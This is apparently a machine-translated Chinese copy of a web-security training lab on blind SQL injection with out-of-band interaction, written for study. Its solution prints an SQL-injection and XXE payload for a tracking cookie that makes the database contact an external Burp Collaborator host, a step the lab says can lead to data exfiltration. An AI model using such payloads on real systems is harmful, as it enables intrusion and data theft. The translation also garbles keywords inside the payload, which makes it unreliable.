实验室:盲目的SQL注入带外交互
从业者
这个实验室包含一个盲目的SQL注射脆弱性。该应用程序使用用于分析的跟踪cookie,并执行包含提交cookie的值的SQL查询。
SQL查询异步执行,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。
解决实验室,利用SQL注射漏洞导致DNS查找到Burp Collaborator。
学习途径
如果你跟着我们的学习途径请注意,此实验室的建议解决方案需要了解我们尚未覆盖的主题。如果你被困,不要担心;一旦你进一步发展了你的知识,就会稍后再回去。
笔记
为防止学院平台用于攻击第三方,我们的防火墙会阻止实验室和任意外部系统之间的交互。要解决实验室,必须使用Burp Collaborator的默认公共服务器(Burpcollaborator.net.
)。
解决方案
- 访问商店的首页,并使用Burp套件拦截和修改包含的请求
跟踪号码
曲奇饼。
修改跟踪号码
Cookie,将其更改为将触发与协作服务器交互的有效负载。例如,您可以将SQL注入与Basic结合起来xxe.技术如下:
trackingid = x'+ Union + Select + ExtractValue(XMLTepe('<%3fxml +版本%3D“1.0”+编码%3D“UTF-8”%3f> <!doctype + root + [+ <!实体+%25 +远程+系统+“http%3a // your -collaborator -id.burpcollaborator.net /”> +%25Remote%3b]>'),'/ l')+从+ dual-----
这里描述的解决方案足以简单地触发DNS查找,因此解决实验室。在真实的情况下,你会使用Burp Collaborator客户端要验证您的有效负载确实触发了DNS查找并可能会利用此行为以从应用程序中删除敏感数据。我们将在下一个实验室中浏览这种技术。